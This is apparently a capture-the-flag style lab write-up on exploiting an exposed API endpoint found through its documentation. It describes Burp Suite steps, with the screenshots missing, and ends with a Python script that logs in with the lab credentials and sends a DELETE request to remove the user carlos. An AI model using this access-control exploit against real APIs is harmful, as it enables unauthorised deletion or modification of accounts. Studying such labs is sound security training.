1. Exploiting an API endpoint using documentation

Accessing the lab webpage:

Looking at the request that intercepted using the burpsuite:

We found an API endpoint, or for example we can try it manually to see the responses, or brute force it to get a hit:

Or we can just update our email and we will get it as a request:

Lets try it:

Using options method we can use these methods:

Lets do GET:

We got a response with JSON formats:

Maybe we need to specify a user, lets try wiener:

Lets try carlos if it is exists:

And here we go:

And now as the objective, we have to delete carlos user to solve the lab, and remember we can use DELETE method as shown above:

Here we go:

Trying PATCH on wiener:

Lets do GET on /api:

Solve it using a python3 script:

import requests  
import re  
import os  
import sys  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
session = requests.session()  
  
  
def Login(username, password):  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)  
    print("[*] Logging In.")  
    data = f"csrf={csrf[0]}&username={username}&password={password}"  
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)  
  
  
def DeleteCarlos():  
    print("[*] Delete The User Carlos.")  
    session.delete(url=url + "api/user/carlos", proxies=proxies, verify=False)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    Login("wiener", "peter")  
    DeleteCarlos()  
    print("[+] Solved.")

PreviousAPI Testing Next2. Exploiting server-side parameter pollution in a query string

Last updated 1 month ago